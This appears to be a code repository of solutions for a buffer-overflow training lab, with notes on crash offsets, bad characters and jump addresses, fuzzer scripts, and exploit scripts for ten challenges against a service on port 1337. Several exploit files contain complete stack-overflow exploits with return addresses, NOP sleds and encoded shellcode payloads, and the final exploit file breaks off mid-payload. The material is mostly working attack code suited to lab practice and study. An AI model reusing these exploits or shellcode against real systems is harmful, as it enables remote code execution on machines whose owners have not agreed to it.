├── OVERFLOW9 ├── notes.txt ├── fuzzer.py └── exploit.py ├── badchars.py ├── OVERFLOW1 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW2 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW3 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW4 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW6 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW7 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW8 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW10 ├── notes.txt ├── fuzzer.py └── exploit.py ├── OVERFLOW5 ├── notes.txt ├── fuzzer.py └── exploit.py ├── exploit.py ├── fuzzer.py └── README.md /OVERFLOW9/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 1600 bytes 2 | 3 | Offset: 1514 4 | 5 | Badchars: \x00\x04\x3e\x3f\xe1 6 | 7 | JMP point: -------------------------------------------------------------------------------- /badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | for x in range(1, 256): 4 | print("\\x" + "{:02x}".format(x), end='') 5 | print() -------------------------------------------------------------------------------- /OVERFLOW1/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 2000 bytes 2 | 3 | Offset: 1978 4 | 5 | Badchars: \x00\x07\x2e\xa0 6 | 7 | JMP point: 625011AF -------------------------------------------------------------------------------- /OVERFLOW2/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 700 bytes 2 | 3 | Offset: 634 4 | 5 | Badchars: \x00\x23\x3c\x83\xba 6 | 7 | JMP point: 625011af -------------------------------------------------------------------------------- /OVERFLOW3/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 1300 bytes 2 | 3 | Offset: 1274 4 | 5 | Badchars: \x11\x40\x5f\xb8\xee 6 | 7 | JMP point: 62501203 -------------------------------------------------------------------------------- /OVERFLOW4/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 2100 bytes 2 | 3 | Offset: 2026 4 | 5 | Badchars: \x00\xa9\xcd\xd4 6 | 7 | JMP point: 625011AF -------------------------------------------------------------------------------- /OVERFLOW6/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 1100 bytes 2 | 3 | Offset: 1034 4 | 5 | Badchars: \x00\x08\x2c\xad 6 | 7 | JMP point: 625011c7 -------------------------------------------------------------------------------- /OVERFLOW7/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 1400 bytes 2 | 3 | Offset: 1306 4 | 5 | Badchars: \x00\x8c\xae\xbe\xfb 6 | 7 | JMP point: 625011df -------------------------------------------------------------------------------- /OVERFLOW8/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 1800 bytes 2 | 3 | Offset: 1786 4 | 5 | Badchars: \x00\x1d\x2e\xc7\xee 6 | 7 | JMP point: 62501203 -------------------------------------------------------------------------------- /OVERFLOW10/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 600 bytes 2 | 3 | Offset: 537 4 | 5 | Badchars: \x00\xa0\xad\xbe\xde\xef 6 | 7 | JMP point: 625011f7 -------------------------------------------------------------------------------- /OVERFLOW5/notes.txt: -------------------------------------------------------------------------------- 1 | Crash point: 400 bytes 2 | 3 | Offset: 314 4 | 5 | Badchars: \x00\x16\x2f\xf4\xfd 6 | 7 | JMP point: 625011af 625011bb -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "MACHINE_IP" 6 | port = MACHINE_PORT 7 | 8 | prefix = "OVERFLOW1 " 9 | offset = 0 10 | overflow = "A" * offset 11 | retn = "" 12 | padding = "" 13 | payload = "" 14 | postfix = "" 15 | 16 | buffer = prefix + overflow + retn + padding + payload + postfix 17 | 18 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | 20 | try: 21 | s.connect((ip, port)) 22 | print("Sending evil buffer...") 23 | s.send(bytes(buffer + "\r\n", "latin-1")) 24 | print("Done!") 25 | except: 26 | print("Could not connect.") 27 | -------------------------------------------------------------------------------- /OVERFLOW3/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.16.223" 6 | port = 1337 7 | timeout = 5 8 | prefix = "OVERFLOW3 " 9 | 10 | string = prefix + "A" * 100 11 | 12 | while True: 13 | try: 14 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 15 | s.settimeout(timeout) 16 | s.connect((ip, port)) 17 | s.recv(1024) 18 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 19 | s.send(bytes(string, "latin-1")) 20 | s.recv(1024) 21 | except: 22 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 23 | sys.exit(0) 24 | string += 100 * "A" 25 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW1/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.16.223" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW1 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW2/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.16.223" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW2 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW4/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.60.34" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW4 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW5/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.60.34" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW5 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW6/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.60.34" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW6 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW7/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.5.108" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW7 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW8/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.5.108" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW8 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW9/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.5.108" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW9 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /OVERFLOW10/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "10.10.5.108" 6 | 7 | port = 1337 8 | timeout = 5 9 | prefix = "OVERFLOW10 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) -------------------------------------------------------------------------------- /fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket, time, sys 4 | 5 | ip = "MACHINE_IP" 6 | port = MACHINE_PORT 7 | 8 | timeout = 5 9 | prefix = "OVERFLOW1 " 10 | 11 | string = prefix + "A" * 100 12 | 13 | while True: 14 | try: 15 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 16 | s.settimeout(timeout) 17 | s.connect((ip, port)) 18 | s.recv(1024) 19 | print("Fuzzing with {} bytes".format(len(string) - len(prefix))) 20 | s.send(bytes(string, "latin-1")) 21 | s.recv(1024) 22 | except: 23 | print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) 24 | sys.exit(0) 25 | string += 100 * "A" 26 | time.sleep(1) 27 | -------------------------------------------------------------------------------- /OVERFLOW7/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.5.108" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW7 " 9 | offset = 1306 10 | overflow = "A" * offset 11 | retn = "\xdf\x11\x50\x62" # 625011df 12 | padding = "\x90" * 16 13 | payload = ("\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" 14 | "\xc5\x20\x48\xe5\x83\xee\xfc\xe2\xf4\x39\xc8\xca\xe5\xc5\x20" 15 | "\x28\x6c\x20\x11\x88\x81\x4e\x70\x78\x6e\x97\x2c\xc3\xb7\xd1" 16 | "\xab\x3a\xcd\xca\x97\x02\xc3\xf4\xdf\xe4\xd9\xa4\x5c\x4a\xc9" 17 | "\xe5\xe1\x87\xe8\xc4\xe7\xaa\x17\x97\x77\xc3\xb7\xd5\xab\x02" 18 | "\xd9\x4e\x6c\x59\x9d\x26\x68\x49\x34\x94\xab\x11\xc5\xc4\xf3" 19 | "\xc3\xac\xdd\xc3\x72\xac\x4e\x14\xc3\xe4\x13\x11\xb7\x49\x04" 20 | "\xef\x45\xe4\x02\x18\xa8\x90\x33\x23\x35\x1d\xfe\x5d\x6c\x90" 21 | "\x21\x78\xc3\xbd\xe1\x21\x9b\x83\x4e\x2c\x03\x6e\x9d\x3c\x49" 22 | "\x36\x4e\x24\xc3\xe4\x15\xa9\x0c\xc1\xe1\x7b\x13\x84\x9c\x7a" 23 | "\x19\x1a\x25\x7f\x17\xbf\x4e\x32\xa3\x68\x98\x48\x7b\xd7\xc5" 24 | "\x20\x20\x92\xb6\x12\x17\xb1\xad\x6c\x3f\xc3\xc2\xdf\x9d\x5d" 25 | "\x55\x21\x48\xe5\xec\xe4\x1c\xb5\xad\x09\xc8\x8e\xc5\xdf\x9d" 26 | "\xb5\x95\x70\x18\xa5\x95\x60\x18\x8d\x2f\x2f\x97\x05\x3a\xf5" 27 | "\xdf\x8f\xc0\x48\x42\xe1\xed\xf8\x20\xe7\xc5\x31\x14\x6c\x23" 28 | "\x4a\x58\xb3\x92\x48\xd1\x40\xb1\x41\xb7\x30\x40\xe0\x3c\xe9" 29 | "\x3a\x6e\x40\x90\x29\x48\xb8\x50\x67\x76\xb7\x30\xad\x43\x25" 30 | "\x81\xc5\xa9\xab\xb2\x92\x77\x79\x13\xaf\x32\x11\xb3\x27\xdd" 31 | "\x2e\x22\x81\x04\x74\xe4\xc4\xad\x0c\xc1\xd5\xe6\x48\xa1\x91" 32 | "\x70\x1e\xb3\x93\x66\x1e\xab\x93\x76\x1b\xb3\xad\x59\x84\xda" 33 | "\x43\xdf\x9d\x6c\x25\x6e\x1e\xa3\x3a\x10\x20\xed\x42\x3d\x28" 34 | "\x1a\x10\x9b\xa8\xf8\xef\x2a\x20\x43\x50\x9d\xd5\x1a\x10\x1c" 35 | "\x4e\x99\xcf\xa0\xb3\x05\xb0\x25\xf3\xa2\xd6\x52\x27\x8f\xc5" 36 | "\x73\xb7\x30") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW10/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.5.108" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW10 " 9 | offset = 537 10 | overflow = "A" * offset 11 | retn = "\xf7\x11\x50\x62" # 625011f7 12 | padding = "\x90" * 16 13 | payload = ("\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" 14 | "\x6d\x44\x83\x38\x83\xee\xfc\xe2\xf4\x91\xac\x01\x38\x6d\x44" 15 | "\xe3\xb1\x88\x75\x43\x5c\xe6\x14\xb3\xb3\x3f\x48\x08\x6a\x79" 16 | "\xcf\xf1\x10\x62\xf3\xc9\x1e\x5c\xbb\x2f\x04\x0c\x38\x81\x14" 17 | "\x4d\x85\x4c\x35\x6c\x83\x61\xca\x3f\x13\x08\x6a\x7d\xcf\xc9" 18 | "\x04\xe6\x08\x92\x40\x8e\x0c\x82\xe9\x3c\xcf\xda\x18\x6c\x97" 19 | "\x08\x71\x75\xa7\xb9\x71\xe6\x70\x08\x39\xbb\x75\x7c\x94\xac" 20 | "\x8b\x8e\x39\xaa\x7c\x63\x4d\x9b\x47\xfe\xc0\x56\x39\xa7\x4d" 21 | "\x89\x1c\x08\x60\x49\x45\x50\x5e\xe6\x48\xc8\xb3\x35\x58\x82" 22 | "\xeb\xe6\x40\x08\x39\xbd\xcd\xc7\x1c\x49\x1f\xd8\x59\x34\x1e" 23 | "\xd2\xc7\x8d\x1b\xdc\x62\xe6\x56\x68\xb5\x30\x2c\xb0\x0a\x6d" 24 | "\x44\xeb\x4f\x1e\x76\xdc\x6c\x05\x08\xf4\x1e\x6a\xbb\x56\x80" 25 | "\xfd\x45\x83\x38\x44\x80\xd7\x68\x05\x6d\x03\x53\x6d\xbb\x56" 26 | "\x68\x3d\x14\xd3\x78\x3d\x04\xd3\x50\x87\x4b\x5c\xd8\x92\x91" 27 | "\x14\x52\x68\x2c\x89\x3c\x45\x9c\xeb\x3a\x6d\x55\xdf\xb1\x8b" 28 | "\x2e\x93\x6e\x3a\x2c\x1a\x9d\x19\x25\x7c\xed\xe8\x84\xf7\x34" 29 | "\x92\x0a\x8b\x4d\x81\x2c\x73\x8d\xcf\x12\x7c\xed\x05\x27\xee" 30 | "\x5c\x6d\xcd\x60\x6f\x3a\x13\xb2\xce\x07\x56\xda\x6e\x8f\xb9" 31 | "\xe5\xff\x29\x60\xbf\x39\x6c\xc9\xc7\x1c\x7d\x82\x83\x7c\x39" 32 | "\x14\xd5\x6e\x3b\x02\xd5\x76\x3b\x12\xd0\x6e\x05\x3d\x4f\x07" 33 | "\xeb\xbb\x56\xb1\x8d\x0a\xd5\x7e\x92\x74\xeb\x30\xea\x59\xe3" 34 | "\xc7\xb8\xff\x63\x25\x47\x4e\xeb\x9e\xf8\xf9\x1e\xc7\xb8\x78" 35 | "\x85\x44\x67\xc4\x78\xd8\x18\x41\x38\x7f\x7e\x36\xec\x52\x6d" 36 | "\x17\x7c\xed") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") 50 | -------------------------------------------------------------------------------- /OVERFLOW1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.16.223" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW1 " 9 | offset = 1978 10 | overflow = "A" * offset 11 | retn = "\xaf\x11\x50\x62" # 625011AF 12 | padding = "\x90" * 16 13 | payload = ("\xbe\x13\xbf\x94\xb6\xdb\xd7\xd9\x74\x24\xf4\x58\x29\xc9\xb1" 14 | "\x52\x83\xe8\xfc\x31\x70\x0e\x03\x63\xb1\x76\x43\x7f\x25\xf4" 15 | "\xac\x7f\xb6\x99\x25\x9a\x87\x99\x52\xef\xb8\x29\x10\xbd\x34" 16 | "\xc1\x74\x55\xce\xa7\x50\x5a\x67\x0d\x87\x55\x78\x3e\xfb\xf4" 17 | "\xfa\x3d\x28\xd6\xc3\x8d\x3d\x17\x03\xf3\xcc\x45\xdc\x7f\x62" 18 | "\x79\x69\x35\xbf\xf2\x21\xdb\xc7\xe7\xf2\xda\xe6\xb6\x89\x84" 19 | "\x28\x39\x5d\xbd\x60\x21\x82\xf8\x3b\xda\x70\x76\xba\x0a\x49" 20 | "\x77\x11\x73\x65\x8a\x6b\xb4\x42\x75\x1e\xcc\xb0\x08\x19\x0b" 21 | "\xca\xd6\xac\x8f\x6c\x9c\x17\x6b\x8c\x71\xc1\xf8\x82\x3e\x85" 22 | "\xa6\x86\xc1\x4a\xdd\xb3\x4a\x6d\x31\x32\x08\x4a\x95\x1e\xca" 23 | "\xf3\x8c\xfa\xbd\x0c\xce\xa4\x62\xa9\x85\x49\x76\xc0\xc4\x05" 24 | "\xbb\xe9\xf6\xd5\xd3\x7a\x85\xe7\x7c\xd1\x01\x44\xf4\xff\xd6" 25 | "\xab\x2f\x47\x48\x52\xd0\xb8\x41\x91\x84\xe8\xf9\x30\xa5\x62" 26 | "\xf9\xbd\x70\x24\xa9\x11\x2b\x85\x19\xd2\x9b\x6d\x73\xdd\xc4" 27 | "\x8e\x7c\x37\x6d\x24\x87\xd0\x98\xbd\xaf\xf8\xf5\xbf\xaf\xe9" 28 | "\x59\x49\x49\x63\x72\x1f\xc2\x1c\xeb\x3a\x98\xbd\xf4\x90\xe5" 29 | "\xfe\x7f\x17\x1a\xb0\x77\x52\x08\x25\x78\x29\x72\xe0\x87\x87" 30 | "\x1a\x6e\x15\x4c\xda\xf9\x06\xdb\x8d\xae\xf9\x12\x5b\x43\xa3" 31 | "\x8c\x79\x9e\x35\xf6\x39\x45\x86\xf9\xc0\x08\xb2\xdd\xd2\xd4" 32 | "\x3b\x5a\x86\x88\x6d\x34\x70\x6f\xc4\xf6\x2a\x39\xbb\x50\xba" 33 | "\xbc\xf7\x62\xbc\xc0\xdd\x14\x20\x70\x88\x60\x5f\xbd\x5c\x65" 34 | "\x18\xa3\xfc\x8a\xf3\x67\x1c\x69\xd1\x9d\xb5\x34\xb0\x1f\xd8" 35 | "\xc6\x6f\x63\xe5\x44\x85\x1c\x12\x54\xec\x19\x5e\xd2\x1d\x50" 36 | "\xcf\xb7\x21\xc7\xf0\x9d") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW4/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.60.34" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW4 " 9 | offset = 2026 10 | overflow = "A" * offset 11 | retn = "\xaf\x11\x50\x62" # 625011AF 12 | padding = "\x90" * 16 13 | payload = ("\xb8\x7e\x53\x81\x45\xda\xc1\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 14 | "\x52\x31\x47\x12\x83\xef\xfc\x03\x39\x5d\x63\xb0\x39\x89\xe1" 15 | "\x3b\xc1\x4a\x86\xb2\x24\x7b\x86\xa1\x2d\x2c\x36\xa1\x63\xc1" 16 | "\xbd\xe7\x97\x52\xb3\x2f\x98\xd3\x7e\x16\x97\xe4\xd3\x6a\xb6" 17 | "\x66\x2e\xbf\x18\x56\xe1\xb2\x59\x9f\x1c\x3e\x0b\x48\x6a\xed" 18 | "\xbb\xfd\x26\x2e\x30\x4d\xa6\x36\xa5\x06\xc9\x17\x78\x1c\x90" 19 | "\xb7\x7b\xf1\xa8\xf1\x63\x16\x94\x48\x18\xec\x62\x4b\xc8\x3c" 20 | "\x8a\xe0\x35\xf1\x79\xf8\x72\x36\x62\x8f\x8a\x44\x1f\x88\x49" 21 | "\x36\xfb\x1d\x49\x90\x88\x86\xb5\x20\x5c\x50\x3e\x2e\x29\x16" 22 | "\x18\x33\xac\xfb\x13\x4f\x25\xfa\xf3\xd9\x7d\xd9\xd7\x82\x26" 23 | "\x40\x4e\x6f\x88\x7d\x90\xd0\x75\xd8\xdb\xfd\x62\x51\x86\x69" 24 | "\x46\x58\x38\x6a\xc0\xeb\x4b\x58\x4f\x40\xc3\xd0\x18\x4e\x14" 25 | "\x16\x33\x36\x8a\xe9\xbc\x47\x83\x2d\xe8\x17\xbb\x84\x91\xf3" 26 | "\x3b\x28\x44\x53\x6b\x86\x37\x14\xdb\x66\xe8\xfc\x31\x69\xd7" 27 | "\x1d\x3a\xa3\x70\xb7\xc1\x24\x75\x4c\xe1\x6c\xe1\x4e\xf1\x9d" 28 | "\xae\xc7\x17\xf7\x5e\x8e\x80\x60\xc6\x8b\x5a\x10\x07\x06\x27" 29 | "\x12\x83\xa5\xd8\xdd\x64\xc3\xca\x8a\x84\x9e\xb0\x1d\x9a\x34" 30 | "\xdc\xc2\x09\xd3\x1c\x8c\x31\x4c\x4b\xd9\x84\x85\x19\xf7\xbf" 31 | "\x3f\x3f\x0a\x59\x07\xfb\xd1\x9a\x86\x02\x97\xa7\xac\x14\x61" 32 | "\x27\xe9\x40\x3d\x7e\xa7\x3e\xfb\x28\x09\xe8\x55\x86\xc3\x7c" 33 | "\x23\xe4\xd3\xfa\x2c\x21\xa2\xe2\x9d\x9c\xf3\x1d\x11\x49\xf4" 34 | "\x66\x4f\xe9\xfb\xbd\xcb\x09\x1e\x17\x26\xa2\x87\xf2\x8b\xaf" 35 | "\x37\x29\xcf\xc9\xbb\xdb\xb0\x2d\xa3\xae\xb5\x6a\x63\x43\xc4" 36 | "\xe3\x06\x63\x7b\x03\x03") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW6/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.60.34" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW6 " 9 | offset = 1034 10 | overflow = "A" * offset 11 | retn = "\xc7\x11\x50\x62" # 625011c7 12 | padding = "\x90" * 16 13 | payload = ("\xdb\xd4\xd9\x74\x24\xf4\xbd\x0a\xa9\xb1\x13\x58\x2b\xc9\xb1" 14 | "\x52\x31\x68\x17\x03\x68\x17\x83\xe2\x55\x53\xe6\x0e\x4d\x16" 15 | "\x09\xee\x8e\x77\x83\x0b\xbf\xb7\xf7\x58\x90\x07\x73\x0c\x1d" 16 | "\xe3\xd1\xa4\x96\x81\xfd\xcb\x1f\x2f\xd8\xe2\xa0\x1c\x18\x65" 17 | "\x23\x5f\x4d\x45\x1a\x90\x80\x84\x5b\xcd\x69\xd4\x34\x99\xdc" 18 | "\xc8\x31\xd7\xdc\x63\x09\xf9\x64\x90\xda\xf8\x45\x07\x50\xa3" 19 | "\x45\xa6\xb5\xdf\xcf\xb0\xda\xda\x86\x4b\x28\x90\x18\x9d\x60" 20 | "\x59\xb6\xe0\x4c\xa8\xc6\x25\x6a\x53\xbd\x5f\x88\xee\xc6\xa4" 21 | "\xf2\x34\x42\x3e\x54\xbe\xf4\x9a\x64\x13\x62\x69\x6a\xd8\xe0" 22 | "\x35\x6f\xdf\x25\x4e\x8b\x54\xc8\x80\x1d\x2e\xef\x04\x45\xf4" 23 | "\x8e\x1d\x23\x5b\xae\x7d\x8c\x04\x0a\xf6\x21\x50\x27\x55\x2e" 24 | "\x95\x0a\x65\xae\xb1\x1d\x16\x9c\x1e\xb6\xb0\xac\xd7\x10\x47" 25 | "\xd2\xcd\xe5\xd7\x2d\xee\x15\xfe\xe9\xba\x45\x68\xdb\xc2\x0d" 26 | "\x68\xe4\x16\x81\x38\x4a\xc9\x62\xe8\x2a\xb9\x0a\xe2\xa4\xe6" 27 | "\x2b\x0d\x6f\x8f\xc6\xf4\xf8\xba\x12\xde\x20\xd2\x18\x1e\xc0" 28 | "\x7f\x94\xf8\x88\x6f\xf0\x53\x25\x09\x59\x2f\xd4\xd6\x77\x4a" 29 | "\xd6\x5d\x74\xab\x99\x95\xf1\xbf\x4e\x56\x4c\x9d\xd9\x69\x7a" 30 | "\x89\x86\xf8\xe1\x49\xc0\xe0\xbd\x1e\x85\xd7\xb7\xca\x3b\x41" 31 | "\x6e\xe8\xc1\x17\x49\xa8\x1d\xe4\x54\x31\xd3\x50\x73\x21\x2d" 32 | "\x58\x3f\x15\xe1\x0f\xe9\xc3\x47\xe6\x5b\xbd\x11\x55\x32\x29" 33 | "\xe7\x95\x85\x2f\xe8\xf3\x73\xcf\x59\xaa\xc5\xf0\x56\x3a\xc2" 34 | 